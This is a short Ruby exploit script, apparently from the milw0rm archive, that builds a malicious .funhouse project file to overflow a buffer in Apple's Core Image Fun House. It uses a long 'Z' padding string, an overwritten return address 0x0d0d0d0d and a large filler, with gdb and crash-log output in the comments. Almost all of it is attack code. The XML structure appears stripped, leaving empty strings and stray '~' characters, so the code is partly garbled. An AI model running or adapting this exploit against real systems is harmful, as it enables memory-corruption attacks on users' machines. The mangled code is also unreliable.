#!/usr/bin/ruby # Copyright (c) Netragard, LLC. adriel@netragard.com # # /Developer/Applications/Graphics Tools/Core Image Fun House.app # /Contents/MacOS/Core Image Fun House # # (gdb) x/10s 0xbfffddf7 # 0xbfffddf7: 'Z' , "DCBA center" # # 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0): # CFPropertyListCreateFromXMLData(): plist parse failed; # the data is notproper UTF-8. The file name for this data # could be: $ # /Users/test/Desktop/SuperTastey.funhouse/file.xml # The parser will retry as in 10.2, but the problem should be # corrected in the plist. # # \x80-\xFF range that do not form proper utf8 len = 300 fname = "SuperTastey" retaddr = 0x0d0d0d0d # There are lots of filtered chars! if File.exist?(fname + ".funhouse/file.xml") File.unlink(fname + ".funhouse/file.xml") Dir.rmdir(fname + ".funhouse") end Dir.mkdir(fname + ".funhouse") FUNSTUFF = "" + "" + "" + "" + "layers" + "" + "" + "file" + "" + "Z" * len + [retaddr].pack("V") + "" + "offsetX" + "0.0" + "offsetY" + "0.0" + "type" + "image" + "" + "" + "classname" + "CIGlassDistortion" + "type" + "filter" + "values" + "" + "inputCenter_CIVectorValue" + "[150 150]" + "inputScale" + "200" + "inputTexture" + "" + "Z" * 50000 + "" + "" + "" + "" + "" + "" + "\n" target_file = File.open("SuperTastey.funhouse/file.xml", "w+") { |f| ~ f.print(FUNSTUFF) # weeeeee... lets have fun. ~ f.close } # milw0rm.com [2008-07-11]